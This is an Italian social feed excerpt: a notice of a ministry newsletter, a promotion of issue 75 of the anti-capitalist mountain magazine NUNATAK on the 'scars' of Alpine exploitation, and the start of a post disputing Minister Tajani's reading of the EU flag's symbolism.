È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


NUNATAK numero 75


NUNATAK numero 75 (Inverno 2024-2025) è una rivista che affronta tematiche legati ai territori montani con un approccio critico e anti-capitalista. Il filo conduttore del numero sono le "cicatrici" - segni indelebili lasciati sui territori alpini dallo sfruttamento turistico, edilizio e industriale, ma anche ferite nella memoria collettiva delle comunità montane. #rivista #iyezine #inyoureyesezine #iyezine.com #Nunatak
#Cicatrici
#TerritoriMontani
#CriticaSociale
#Anticapitalismo
#Olimpiadi2026
#ImpattoAmbientale
#ResistenzaComunitaria
#SaperiTradizionali
#LotteIndigene
#AlpiItaliane
#TurismoSostenibile
#MemoriaCollettiva
#AlternativeAlModelloDominante

iyezine.com/nunatak-numero-75



La falsa interpretazione del ministro degli Esteri Tajani sul significato della bandiera dell’Unione Europea


@Politica interna, europea e internazionale
In occasione del quarantesimo anniversario dalla creazione della bandiera dell’Unione Europea, il ministro degli Esteri italiano, Antonio Tajani, ha riportato sui social un’interpretazione 
del tutto falsa del suo significato e della sua simbologia.